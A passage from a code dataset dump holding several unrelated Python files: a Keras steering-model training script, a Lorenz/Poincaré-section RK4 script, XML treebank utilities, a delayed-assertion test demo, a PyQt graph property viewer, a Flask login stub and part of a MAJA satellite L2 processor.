load_and_augment_image(image_data[row_index])\r\n image2 = load_and_augment_image(image_data[row_index + future_index])\r\n \r\n batch_images[batch_index] = image1 - image2\r\n batch_steering[batch_index] = steer_angle\r\n generated_steering_angles.append(steer_angle)\r\n yield batch_images, batch_steering\r\n\r\n# Model\r\n\r\nmodel = Sequential()\r\nmodel.add(Lambda(lambda x: x/127.5 - 1., input_shape = (PROCESSED_IMG_ROWS, PROCESSED_IMG_COLS, PROCESSED_IMG_CHANNELS)))\r\nmodel.add(Convolution2D(24, 5, 5, subsample = (2, 2), activation = 'elu', name = 'Conv1'))\r\nmodel.add(Convolution2D(36, 5, 5, subsample = (2, 2), activation = 'elu', name = 'Conv2'))\r\nmodel.add(Convolution2D(48, 5, 5, subsample = (2, 2), activation = 'elu', name = 'Conv3'))\r\nmodel.add(Convolution2D(64, 3, 3, activation = 'elu', name = 'Conv4'))\r\nmodel.add(Convolution2D(64, 3, 3, activation = 'elu', name = 'Conv5'))\r\nmodel.add(Flatten())\r\nmodel.add(Dropout(0.2))\r\nmodel.add(ELU())\r\nmodel.add(Dense(100, activation = 'elu', name = 'FC1'))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(Dense(50, activation = 'elu', name = 'FC2'))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(Dense(10, activation = 'elu', name = 'FC3'))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(Dense(1, activation = 'elu', name = 'FC4'))\r\nmodel.summary()\r\n\r\n# checkpoints\r\n\r\ncheckpoint = ModelCheckpoint(filepath = '/content/drive/model2_2-{epoch:003d}.h5', \r\n monitor = 'val_loss',\r\n verbose = 1,\r\n save_best_only = False,\r\n mode = 'auto')\r\n\r\n# compile\r\nopt = Adam(lr = 0.001)\r\nmodel.compile(optimizer = opt, loss = 'mse', metrics = [])\r\n\r\nclass LifecycleCallback(keras.callbacks.Callback):\r\n \r\n def on_epoch_begin(self, epoch, logs = {}):\r\n pass\r\n \r\n def on_epoch_end(self, epoch, logs = {}):\r\n global threshold\r\n threshold = 1 / (epoch + 1)\r\n \r\n def on_batch_begin(self, batch, logs = {}):\r\n pass\r\n \r\n def on_batch_end(self, batch, logs = {}):\r\n self.losses.append(logs.get('loss'))\r\n \r\n def on_train_begin(self, logs = {}):\r\n print('BEGIN TRAINING!...')\r\n self.losses = []\r\n \r\n def on_train_end(self, logs = {}):\r\n print('END TRAINING')\r\n \r\n# Calculate the correct number of samples per epoch based on batch size\r\n\r\ndef calc_samples_per_epoch(array_size, batch_size):\r\n num_batches = array_size / batch_size\r\n samples = math.ceil(num_batches)\r\n samples_per_epoch = int((samples * batch_size)) \r\n return samples_per_epoch\r\n\r\n# Let the training begin !\r\n\r\nlifecycle_callback = LifecycleCallback()\r\n\r\ntrain_generator = generate_batch_data(X_train, y_train, BATCH_SIZE)\r\nvalidation_generator = generate_batch_data(X_validation, y_validation, BATCH_SIZE)\r\n\r\nsamples_per_epoch = calc_samples_per_epoch(len(X_train), BATCH_SIZE)\r\nnb_val_samples = calc_samples_per_epoch(len(X_validation), BATCH_SIZE)\r\n\r\nhistory = model.fit_generator(train_generator,\r\n validation_data = validation_generator,\r\n samples_per_epoch = len(X_train),\r\n nb_val_samples = len(X_validation),\r\n nb_epoch = NB_EPOCH, verbose = 1,\r\n callbacks = [lifecycle_callback, checkpoint])\r\n\r\n# save model\r\nmodel.save(\"/content/drive/model2_2.h5\")\r\nmodel_json = model.to_json()\r\nwith open(\"/content/drive/model2.json\", \"w\") as json_file:\r\n json.dump(model_json, json_file)\r\nmodel.save_weights(\"/content/drive/model2_weights_2.h5\")\r\nprint(\"saved model to disk\")\r\n\r\nbinwidth = 0.025\r\nplt.figure()\r\nplt.hist(generated_steering_angles, bins=np.arange(min(generated_steering_angles), max(generated_steering_angles) + binwidth, binwidth))\r\nplt.title('Number of augmented images per steering angle')\r\nplt.xlabel('Steering Angle')\r\nplt.ylabel('# Augmented Images')\r\nplt.savefig(\"/content/drive/batchaug_steering_angles_2_2.png\")\r\n\r\nplt.figure()\r\nprint(history.history.keys())\r\n\r\n# summarize history for epoch loss\r\nplt.plot(history.history['loss'])\r\nplt.plot(history.history['val_loss'])\r\nplt.title('model loss')\r\nplt.ylabel('loss')\r\nplt.xlabel('epoch')\r\nplt.legend(['train', 'validation'], loc='upper right')\r\n\r\nplt.savefig(\"/content/drive/model2_nvidia_loss_eps_2_2.png\")\r\n\r\n# summarize history for batch loss\r\nplt.figure()\r\nbatch_history = lifecycle_callback.losses\r\nplt.plot(batch_history)\r\nplt.title('model loss')\r\nplt.ylabel('loss')\r\nplt.xlabel('batches')\r\n\r\nplt.savefig(\"/content/drive/model2_nvidia_loss_batches_2_2.png\")\r\n\r\n\r\n\r\n \r\n \r\n\r\n","sub_path":"TemporalModel_MODEL5.py","file_name":"TemporalModel_MODEL5.py","file_ext":"py","file_size_in_byte":7488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"131907842","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sympy as sy\n\ndef plot(x_values, y_values, initialConditions,i):\n plt.plot(x_values,y_values, 'o', markersize = 0.5)\n plt.xlabel(r'$x$')\n plt.ylabel(r'$z$')\n #plt.savefig(str(theta0) + '-' + str(omega0) + '.png')\n #plt.savefig('lorenz'+str(r[i])+'-'+str(initialConditions[0])+'-'+str(initialConditions[1])+'-'+str(initialConditions[2])+'.png')\n plt.savefig('testing.png')\n plt.clf()\n\ndef plotPoincare(x_values, y_values, T, typeName, timestep=-1, option=-1):\n plt.plot(x_values,y_values, 'o', markersize = 0.5)\n plt.xlabel(r'$x$')\n plt.ylabel(r'$z$')\n #plt.xlim([9,17.5])\n #plt.ylim([18,55])\n #plt.xlim([-0.1,0.])\n #plt.ylim([18,55])\n plt.savefig('poincareSpatial' + str(T) + typeName + str(option) + str(timestep) +'.png')\n plt.clf()\n\ndef writetofile(thetaValues, omegaValues):\n for i in range(0, len(thetaValues)):\n outString = str(thetaValues[i]) + \", \" + str(omegaValues[i]) + \", \" + \"\\n\"\n with open('output' + str(runningCounter) + '.csv', \"a\") as f:\n f.write(outString)\n\ndef trajectories(x,h,n,f,t):\n k1 = []\n k2 = []\n k3 = []\n k4 = []\n xi1 = []\n for i in range(n):\n k1.append(h*f[i](x,t))\n for i in range(n):\n xi1.append(x[i] + k1[i]*0.5)\n for i in range(n):\n k2.append(f[i](xi1, t + h/2)*h)\n for i in range(n):\n xi1[i] = x[i] + k2[i]*0.5\n for i in range(n):\n k3.append(f[i](xi1, t + h/2)*h)\n for i in range(n):\n xi1[i] = x[i] + k3[i]\n for i in range(n):\n k4.append(f[i](xi1, t +h)*h)\n for i in range(n):\n xi1[i] = x[i] + (k1[i] + 2*(k2[i] + k3[i]) + k4[i])/6\n return xi1\n\n\ndef rk4(t0, h, n, n_dims, xt0, f, system):\n x = xt0\n trajectory1 = []\n trajectory2 = []\n trajectory3 = []\n timeStamp = []\n trajectory1.append(x[0])\n trajectory2.append(x[1])\n timeStamp.append(t0)\n t = t0\n for i in range(n):\n x_new = trajectories(x, h, n_dims, f, t)\n x = x_new\n trajectory1.append(x_new[0])\n trajectory2.append(x_new[1])\n if system > 0:\n trajectory3.append(x_new[2])\n timeStamp.append(t+h)\n t += h\n #print(\"trajectory1: {}\".format(trajectory1[0:250])\n if system == 0:\n newTrajectory1 = []\n for i in range(len(trajectory1)):\n newTrajectory1.append(trajectory1[i]%(2*np.pi))\n plot(newTrajectory1,trajectory2,[0,0,0],0)\n return[newTrajectory1, trajectory2, timeStamp]\n else:\n return [trajectory1, trajectory2, trajectory3]\n\n\ndef poincare(T):\n trajectoryVector = rk4(0,timestep, int(1000/timestep),len(f), xt0, f,0)\n poincare1 = []\n poincare2 = []\n n = 1\n threshHold = T\n helper = 0\n checker = 0.0\n pointCounter = 0\n while (helper < len(trajectoryVector[2])):\n checker += timestep\n if (checker > threshHold*pointCounter):\n pointCounter += 1\n poincare1.append(trajectoryVector[0][helper])\n poincare2.append(trajectoryVector[1][helper])\n helper += 1\n\n print(pointCounter)\n #writetofile(poincare1, poincare2)\n plotPoincare(poincare1, poincare2, T, 'temporal', timestep)\n\n\ndef poincareInterpolation(T):\n trajectoryVector = rk4(0,timestep, int(1000/timestep),len(f), xt0, f,0)\n poincare1 = []\n poincare2 = []\n n = 1\n threshHold = T\n helper = 0\n checker = 0.0\n pointCounter = 0\n while (helper < len(trajectoryVector[2])):\n checker += timestep\n if (checker > threshHold*pointCounter):\n # t = sy.symbols('t')\n # prevPoint = [trajectoryVector[0][helper-1],trajectoryVector[1][helper-1]]\n # nextPoint = [trajectoryVector[0][helper],trajectoryVector[1][helper]]\n # xt = prevPoint[0]+(prevPoint[0]-nextPoint[0])*t\n # yt = prevPoint[1]+(prevPoint[1]-nextPoint[1])*t\n # point_on_plane = [xt.subs(t,threshHold*pointCounter),yt.subs(t,threshHold*pointCounter)]\n t_prev_to_plane = np.abs(threshHold*pointCounter - trajectoryVector[2][helper-1])\n point_on_plane = trajectories([trajectoryVector[0][helper-1],trajectoryVector[1][helper-1]],t_prev_to_plane, 2, f, trajectoryVector[2][helper-1])\n poincare1.append(point_on_plane[0])\n poincare2.append(point_on_plane[1])\n pointCounter += 1\n poincare1.append(point_on_plane[0])\n poincare2.append(point_on_plane[1])\n helper += 1\n\n print(pointCounter)\n writetofile(poincare1, poincare2)\n plotPoincare(poincare1, poincare2, T, 'temporal-intp', timestep)\n\n\ndef poincareSpatial(option, f,x):\n t = sy.symbols('t')\n xx = sy.symbols('xx')\n y = sy.symbols('y')\n trajectoryVector = rk4(0,timestep, 10000,3, x, f,1)\n poincare1 = []\n poincare2 = []\n n = 1\n if option == 0:\n norm = [0,1,0]\n x_sigma = [0,20,0]\n else:\n norm = [-2,1,0]\n x_sigma = [2,4,0]\n pointCounter = 0\n for i in range(len(trajectoryVector[0])-2):\n prevPoint = [trajectoryVector[0][i],trajectoryVector[1][i],trajectoryVector[2][i]]\n nextPoint = [trajectoryVector[0][i+1],trajectoryVector[1][i+1],trajectoryVector[2][i+1]]\n d_prevPoint = [trajectoryVector[0][i]-x_sigma[0],trajectoryVector[1][i]-x_sigma[1],trajectoryVector[2][i]-x_sigma[2]]\n d_nextPoint = [trajectoryVector[0][i+1]-x_sigma[0],trajectoryVector[1][i+1]-x_sigma[1],trajectoryVector[2][i+1]-x_sigma[2]]\n #print(prevPoint,nextPoint)\n dot1 = np.dot(d_prevPoint,norm)\n dot2 = np.dot(d_nextPoint, norm)\n #print(dot1,dot2)\n print(dot2)\n if np.sign(dot1) <= 0 and np.sign(dot2) > 0:\n pointCounter += 1\n xt = prevPoint[0]+(prevPoint[0]-nextPoint[0])*t\n yt = prevPoint[1]+(prevPoint[1]-nextPoint[1])*t\n zt = prevPoint[2]+(prevPoint[2]-nextPoint[2])*t\n intersection_point = 0\n point_on_plane = []\n if option == 0:\n intersection_point = sy.solve(yt-0*xt+0*zt-20, t)\n point_on_plane = [xt.subs(t,intersection_point[0]),yt.subs(t,intersection_point[0]),zt.subs(t,intersection_point[0])]\n else:\n intersection_point = sy.solve(yt-2*xt+0*zt, t)\n point_on_plane = [xt.subs(t,intersection_point[0]),yt.subs(t,intersection_point[0]),zt.subs(t,intersection_point[0])]\n poincare1.append(point_on_plane[0])\n poincare2.append(point_on_plane[2])\n print(pointCounter)\n print(poincare1)\n #writetofile(poincare1, poincare2)\n plotPoincare(poincare1, poincare2, 0, 'spatial-intp', option)\n\n\n\ndef ftheta(x,t):\n return x[1]\n\ndef fomega(x,t):\n l = .1\n m = .1\n g = 9.8\n A = 0.9\n #A = 0\n alpha = 0.75*np.sqrt(g/l)\n beta = 0.25\n #beta = 0\n return ((A * np.cos(alpha*t))-(beta*l*x[1])-(m*g*np.sin(x[0])))/(m*l)\n\nf = [ftheta, fomega]\ntheta0 = 0.01\nomega0 = 0\nxt0 = [theta0,omega0,0]\ntimestep = 0.1\n#rk4(0,timestep, 10000,len(f), xt0, f)\nl = .1\nm = .1\ng = 9.8\ndef lorenz(a,r,b,x0,y0,z0):\n def fx(x,t):\n return a*(x[1]-x[0])\n def fy(x,t):\n return r*x[0]-x[1]-x[0]*x[2]\n def fz(x,t):\n return x[0]*x[1]-b*x[2]\n\n f = [fx, fy, fz]\n x = [x0,y0,z0]\n timestep = 0.005\n tol = 10\n poincareSpatial(1,f,x)\n #rk4(0,timestep,200,len(f),x,f)\n#poincare(0.75*2*np.pi*np.sqrt(l/g))\n#poincareInterpolation(0.75*2*np.pi*np.sqrt(l/g))\n#poincare(2)\n#runningCounter = input('Number:')\nlorenz(16,50,4,-13,-13,52)\n\n#poincareInterpolation(0.75*2*np.pi*np.sqrt(l/g))\n","sub_path":"7PS/poincare.py","file_name":"poincare.py","file_ext":"py","file_size_in_byte":7598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"354939263","text":"\"\"\" XML Utils\n\"\"\"\n\nfrom lxml import etree as ET\n\ndef to_str(xml):\n \"\"\" Convert XML to string\n \"\"\"\n return ET.tostring(xml, encoding='utf-8', pretty_print=True,\n xml_declaration=False)\n\n\ndef get_treebank_forms(file, all_data=0):\n \"\"\" Get treebank token forms\n \"\"\"\n sentences = []\n for el in ET.parse(file).xpath('//*'):\n if el.tag == 'sentence':\n sentences.append([])\n elif el.tag == 'word':\n if all_data:\n sentences[-1].append(el.attrib)\n if 'artificial' in el.attrib:\n sentences[-1][-1]['ellipsis-id'] = el.attrib['id']\n sentences[-1][-1]['lemma'] = ''\n sentences[-1][-1]['postag'] = ''\n else:\n ellipsis = 1 if 'artificial' in el.attrib else 0\n sentences[-1].append((el.attrib['id'], el.attrib['form'], ellipsis))\n\n return sentences\n","sub_path":"papygreek/controllers/tools/xml.py","file_name":"xml.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"85561469","text":"'''\nDemo continue the reset of tests after assert failed\n\nCreated on Jul 20, 2016\n\n@author: WAH\n'''\nfrom pats.pyunit.testtemplate import TestCaseTemplate\nfrom pats.delayedAssert import expect, assert_expectations\n\n\nclass Case0304(TestCaseTemplate):\n\n @classmethod\n def setUpClass(cls):\n pass\n\n @classmethod\n def tearDownClass(cls):\n pass\n\n def setUp(self):\n super(Case0304, self).setUp()\n\n def tearDown(self):\n pass\n\n def test_01(self):\n\n step = \"verify current equals to expected\"\n current = 1\n expected = 2\n err_message = \"%s => failed\"%step\n self.perform(self.assertEqual, current, expected, err_message)\n\n step = \"verify result is expected\"\n result = False\n err_message = \"%s => failed\"%step\n self.perform(self.assertTrue, result, err_message)\n\n step = \"verify items in two lists are equal\"\n current = [1, 3, 5, \"A\", \"google\"]\n expected = [\"google\", 5, \"A\", 1, 3]\n err_message = \"%s => failed\"%step\n self.perform(self.assertCountEqual, current, expected, err_message)\n\n current = [1, 3, 5, \"koodo\", \"A\"]\n self.perform(self.assertCountEqual, current, expected, err_message)\n\n step = \"verify result contains expected item\"\n result = \"Hello world python\"\n target = \"World\"\n err_message = \"%s => failed\"%step\n self.perform(self.assertIn, target, result, err_message)\n\n #self._verifyErrors()\n\n\n def test_02(self):\n\n step = \"verify current equals to expected\"\n current = 1\n expected = 2\n err_message = \"%s => failed\"%step\n expect(current == expected, err_message)\n\n step = \"verify result is expected\"\n result = False\n err_message = \"%s => failed\"%step\n expect(result is True, err_message)\n\n step = \"verify items in two lists are equal\"\n current = [1, 3, 5, \"A\", \"google\"]\n expected = [\"google\", 5, \"A\", 1, 3]\n err_message = \"%s => failed\"%step\n expect(current == expected, err_message)\n\n current = [1, 3, 5, \"koodo\", \"A\"]\n expect(current == expected, err_message)\n\n step = \"verify result contains expected item\"\n result = \"Hello world python\"\n target = \"World\"\n err_message = \"%s => failed\"%step\n expect(target in result, err_message)\n\n assert_expectations()\n\n\nif __name__ == \"__main__\":\n Case0304.execute()\n","sub_path":"docs/samples/pyunit test project/tests/suite03/case0304.py","file_name":"case0304.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"633925953","text":"# -*- python -*-\n#\n# tissueview: function used to display tissue properties\n#\n# Copyright 2006 INRIA - CIRAD - INRA \n#\n# File author(s): Jerome Chopard \n#\n# Distributed under the Cecill-C License.\n# See accompanying file LICENSE.txt or copy at\n# http://www.cecill.info/licences/Licence_CeCILL-C_V1-en.html\n# \n# OpenAlea WebSite : http://sa_oa.gforge.inria.fr\n#\n\n__doc__=\"\"\"\nThis module defines functions to display a property on a topomesh\n\"\"\"\n\n__license__= \"Cecill-C\"\n__revision__=\" $Id: $ \"\n\nfrom PyQt4.QtCore import Qt,SIGNAL\nfrom sa_vp.plantgl.algo import GLRenderer\nfrom sa_vp.plantgl.scenegraph import Material,Scene,Shape\nfrom sa_oa.pglviewer import SceneView\nfrom model_output.graph_prop_display import (draw_graph_prop,\n _mat_map_func)\n\ndefault_mat = Material()\ndefault_mat.transparency = 0.5\n\nclass GraphScalarPropView (SceneView) :\n\t\"\"\"View on a scalar prop defined on a mesh.\n\t\"\"\"\n\tdef __init__ (self, graph, pos, deg, prop, shrink, cmap) :\n\t\tSceneView.__init__(self)\n\t\tself.idmode = GLRenderer.ShapeId\n\t\tself.set_alpha_threshold(0.1)\n\t\t\n\t\tself.set_name(\"scalar_prop\")\n\t\t\n\t\tself._graph = graph\n\t\tself._pos = pos\n\t\tself._deg = deg\n\t\tself._prop = prop\n\t\tself._shrink = shrink\n\t\tself._cmap = cmap\n\t\t\n\t\tself._triangulation_method = 'topo'\n\t\tself._cache_geometry = None\n\t\n\tdef redraw (self, send_signal = True) :\n\t\tif self._cache_geometry is None :\n\t\t\tsc = draw_graph_prop (self._graph, self._pos, self._deg, self._prop, self._shrink, self._cmap,\n None, 'topo')\n\t\telse :\n\t\t\tsc = Scene()\n\t\t\tmat_map = _mat_map_func(self._prop,\n\t\t\t self._cmap,\n\t\t\t default_mat)\n\t\t\tfor wid,geom in self._cache_geometry.iteritems() :\n\t\t\t\tmat = mat_map(wid)\n\t\t\t\tif mat is not None :\n\t\t\t\t\tshp = Shape(geom,mat)\n\t\t\t\t\tshp.id = wid\n\t\t\t\t\tsc.add(shp)\n\t\t\n\t\tself.clear(False)\n\t\tself.merge(sc,send_signal)\n\t\n\tdef cache_geometry (self, cache = True) :\n\t\t\"\"\"Precompute the geometry.\n\t\t\n\t\tUse this function to accelerate\n\t\tthe redraw of a scene if the\n\t\tunderlying geometry do not change.\n\t\t\n\t\t:Parameters:\n\t\t - `cache` (bool) - if True, compute\n\t\t the actual geometry of a scene and\n\t\t store it. Else, reset any precomputed\n\t\t geometry\n\t\t\n\t\t:Returns Type: False\n\t\t\"\"\"\n\t\tif cache :\n\t\t\tsc = draw_scalar_prop(self._graph,\n\t\t\t self._pos,\n\t\t\t self._deg,\n\t\t\t self._prop,\n\t\t\t self._shrink,\n\t\t\t self._cmap,\n\t\t\t default_mat,\n\t\t\t self._triangulation_method)\n\t\t\t\n\t\t\tself._cache_geometry = dict( (shp.id,shp.geometry) \\\n\t\t\t for shp in sc)\n\n\t\telse :\n\t\t\tself._cache_geometry = None\n\n\n\t\n\t##############################################\n\t#\n\t#\tinteraction\n\t#\n\t##############################################\n\tdef prop_type (self) :\n\t\t\"\"\"Retrieve the type of value\n\t\tstored in this quantity.\n\t\t\n\t\t:Return:\n\t\t - a string defining the type\n\t\t - None if no type is defined\n\t\t\n\t\t:Returns Type:\n\t\t - str\n\t\t - None\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._prop.type()\n\t\texcept AttributeError :\n\t\t\treturn None\n\t\n\tdef value (self, elmid) :\n\t\t\"\"\"Returns the value of the property.\n\t\t\"\"\"\n\t\treturn self._prop.get(elmid,None)\n\t\n\tdef set_value (self, elmid, val, send_signal = True) :\n\t\t\"\"\"Set the value of the property.\n\t\t\"\"\"\n\t\tif val is None :\n\t\t\tself._prop.pop(elmid,None)\n\t\telse :\n\t\t\tself._prop[elmid] = val\n\t\tif send_signal :\n\t\t\tself.emit(SIGNAL(\"set_value\"),elmid,val)\n\t\n\tdef values (self) :\n\t\t\"\"\"Iterator on all (wid,val).\n\t\t\"\"\"\n\t\treturn self._prop.iteritems()\n\t\n\tdef set_values (self, items) :\n\t\t\"\"\"Change all values.\n\t\t\"\"\"\n\t\tself._prop.clear()\n\t\tself._prop.update(items)\n\t\tself.emit(SIGNAL(\"set_values\") )\n\t\n\tdef clear_values (self) :\n\t\t\"\"\"Clear property\n\t\t\"\"\"\n\t\tself._prop.clear()\n\t\tself.emit(SIGNAL(\"clear_values\") )\n\t\n\tdef fill (self, elmid, val) :\n\t\t\"\"\"Fill a zone around the given element\n\t\twith the given value.\n\t\t\"\"\"\n\t\tmesh = self._mesh\n\t\tdeg = self._deg\n\t\tprop = self._prop\n\t\told_val = prop.get(elmid,None)\n\t\t#temporary\n\t\tassert deg > 0\n\t\t#\n\t\tfront = set([elmid])\n\t\twhile len(front) > 0 :\n\t\t\twid = front.pop()\n\t\t\tself.set_value(wid,val,False)\n\t\t\tfor nid in mesh.border_neighbors(deg,wid) :\n\t\t\t\tif (self.value(nid) == old_val) \\\n\t\t\t\t and (self.value(nid) != val) :\n\t\t\t\t\tfront.add(nid)\n\t\tself.emit(SIGNAL(\"fill\"),elmid,val)\n\n\n","sub_path":"Openalea/CPIBOpenAlea/model_output/simviewer_dependent/graph_prop_view.py","file_name":"graph_prop_view.py","file_ext":"py","file_size_in_byte":4426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"258458596","text":"from . import app, login_manager\n\n# USER HANDLING\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n # login and validate the user...\n login_user(user)\n flash(\"Logged in successfully.\")\n return redirect(request.args.get(\"next\") or url_for(\"menu\"))\n return render_template(\"login.html\", form=form)\n\n@app.route('/')\ndef index():\n if user.is_active():\n return redirect(url_for(\"menu\"))\n return redirect(url_for(\"login\"))\n\n@app.route('/menu')\n@app.route('/menu/')\n@login_required\ndef menu(screen=\"entrance\"):\n return render_template('menu.html', )","sub_path":"web_hs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"368424495","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2020 Centre National d'Etudes Spatiales (CNES)\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\"\"\"\n###################################################################################################\n#\n# o o\n# oo oo oo o oo ,-.\n# o o o o o o o o o \\_/\n# o o o o o o o o {|||)<\n# o o oooooo o oooooo / \\\n# o o o o o o o o `-^\n# o o o o oooo o o\n#\n###################################################################################################\n\norchestrator.processor.base_processor -- shortdesc\n\norchestrator.processor.base_processor is the base of all processors\n\nIt defines method mandatory for a processor\n\n\n###################################################################################################\n\"\"\"\n\n\nfrom orchestrator.processor.l2_processor import L2Processor\nfrom orchestrator.common.maja_exceptions import MajaChainException\nfrom orchestrator.plugins.common.factory.maja_l1_image_reader_provider import L1ImageReaderProvider\nfrom orchestrator.plugins.common.factory.maja_plugin_provider import MAJAPluginProvider\nfrom orchestrator.plugins.common.factory.maja_l2_image_writer_provider import L2ImageWriterProvider\nimport orchestrator.plugins.common.factory.product_utils as product_utils\nfrom orchestrator.common.earth_explorer.gipp_l2_comm_earth_explorer_xml_file_handler import GippL2COMMEarthExplorerXMLFileHandler\nimport orchestrator.common.gipp_utils as gipp_utils\nfrom orchestrator.common.interfaces.maja_ozone_extract import get_ozone_amount\nimport orchestrator.common.constants as constants\nimport orchestrator.common.date_utils as date_utils\nfrom orchestrator.common.logger.maja_logging import configure_logger\nfrom orchestrator.common.xml_tools import translate_xsl\nfrom orchestrator.common.constants import CAMSStatus\nimport orchestrator.common.file_utils as file_utils\nimport os\nLOGGER = configure_logger(__name__)\n\n\nclass L2NominalProcessor(L2Processor):\n\n def __init__(self, apphandler):\n self._name = \"L2_NOMINAL\"\n self._l1product = None\n super(L2NominalProcessor, self).__init__(apphandler)\n\n def pre_processing(self):\n LOGGER.info(\"Starting Preprocessing\")\n self._l1product = product_utils.get_input_l1_image_product(self._apphandler.get_input_directory(),\n tile_id=self._apphandler.get_tile_id())\n self.init_list_of_sat()\n self.activate_this_sat(self._l1product.Satellite, self._l1product.PluginName, self._l1product.UniqueSatellite)\n\n # Instanciate plugin\n self.plugin = MAJAPluginProvider.create(self._l1product.PluginName, self._apphandler)\n super(L2NominalProcessor, self).pre_processing()\n LOGGER.info(\"Ending Preprocessing\")\n\n def scientific_processing(self):\n LOGGER.info(\"Starting ScientifiqProcessing\")\n l_InitMode = False\n l_BackwardMode = False\n l_Sat = self._l1product.Satellite\n\n \"\"\" ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **\n Get and registers the L2COMM GIPP file L2COMM\n parameters have been read in the L1ImaegFileReader !!\n ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *\"\"\"\n l_GIP_L2COMM_Filename = gipp_utils.get_gipp_filename_with_mission(self._apphandler.get_input_directory(),\n \"GIP_L2COMM\", l_Sat)\n\n if self._apphandler._stylesheet is not None:\n LOGGER.debug(\"Overloading L2COMM parameters...\")\n l_GIP_L2COMM_Filename = file_utils.copy_file_to_directory(l_GIP_L2COMM_Filename,\n self._apphandler.get_working_directory(), notestmode=True)\n translate_xsl(l_GIP_L2COMM_Filename, self._apphandler._stylesheet)\n\n\n LOGGER.info(\n \"The GIP_L2COMM file detected for the satellite '\" + l_Sat + \"' is <\" + l_GIP_L2COMM_Filename + \">.\")\n l_GIPPL2COMMHandler = GippL2COMMEarthExplorerXMLFileHandler(l_GIP_L2COMM_Filename)\n \"\"\" ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **\n Register the GIPP file \"GIP_L2SITE\" */\n ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** *\"\"\"\n l_GIP_L2SITE_Filename = gipp_utils.get_gipp_filename_with_mission(self._apphandler.get_input_directory(),\n \"GIP_L2SITE\",\n self._l1product.UniqueSatellite)\n\n if self._apphandler._stylesheet is not None:\n LOGGER.debug(\"Overloading L2SITE parameters...\")\n l_GIP_L2SITE_Filename = file_utils.copy_file_to_directory(l_GIP_L2SITE_Filename,\n self._apphandler.get_working_directory(), notestmode=True)\n translate_xsl(l_GIP_L2SITE_Filename, self._apphandler._stylesheet)\n\n\n LOGGER.info(\n \"The GIP_L2SITE file detected for the satellite '\" +\n self._l1product.UniqueSatellite +\n \"' is <\" +\n l_GIP_L2SITE_Filename +\n \">.\")\n\n # Get the athmospheric/CAMS\n # ---------------------------------------------------------------------------------------------\n if l_GIPPL2COMMHandler.get_value_b(\"UseCamsData\"):\n l_modelList = l_GIPPL2COMMHandler.get_value(\"ListOfModels\").split()\n l_avgTime = date_utils.get_julianday_as_double(self._l1product.ProductDate)\n LOGGER.info(\"Cams data requested\")\n # Verify if cams file are available before anything\n if self._CAMS_Files_HandlersMAP[l_Sat].has_cams_data(l_avgTime):\n self._CAMS_Files_HandlersMAP[l_Sat].extract_cams_datas(self._l1product.CenterCorner.latitude,\n self._l1product.CenterCorner.longitude,\n l_avgTime)\n if self._CAMS_Files_HandlersMAP[l_Sat].valid:\n self._AthmosphericLutHandlerMap[l_Sat].set_proportions(\n self._CAMS_Files_HandlersMAP[l_Sat].proportions)\n LOGGER.info(\"CAMS found, sampling : \" + str(self._CAMS_Files_HandlersMAP[l_Sat].out_rh_sampling))\n for m in l_modelList:\n l_use_rh = self._CAMS_Files_HandlersMAP[l_Sat].get_extinction_map()[m][\"rh_dep\"]\n self._AthmosphericLutHandlerMap[l_Sat].add_lut_for_model(\n self._apphandler.get_input_directory(),\n self._apphandler.get_working_directory(),\n l_Sat,\n m,\n self._validate_schemas,\n os.path.join(\n self._apphandler.get_schemas_root_install_dir(),\n self.plugin.MAJA_INSTALL_SCHEMAS_DIR),\n p_userh=l_use_rh,\n p_rh=self._CAMS_Files_HandlersMAP[l_Sat].out_rh_sampling)\n tmp_atmolut = self._apphandler.get_directory_manager().get_temporary_directory(\"AtmoLut_\", do_always_remove=True)\n self._AthmosphericLutHandlerMap[l_Sat].gen_synthetised_luts(tmp_atmolut)\n self._cams_status = CAMSStatus.ACTIVATED_OK\n else:\n LOGGER.warn(\"No valid cam data found for product, using constant model\")\n self._cams_status = CAMSStatus.ACTIVATED_NOAVAILABLEDATA\n else:\n LOGGER.warn(\"No valid cam data found for product at time \"+ date_utils.get_date_yyyymmdd_from_tm(self._l1product.ProductDate)+\", using constant model\")\n self._cams_status = CAMSStatus.ACTIVATED_NOAVAILABLEDATA\n\n # ---------------------------------------------------------------------------------------------\n # Initialize L1 image reader\n l_UniqueSatelliteD = self._l1product.UniqueSatellite\n l1_image_reader = L1ImageReaderProvider.create(\n self._l1product.PluginName,\n self._l1product,\n self._apphandler,\n 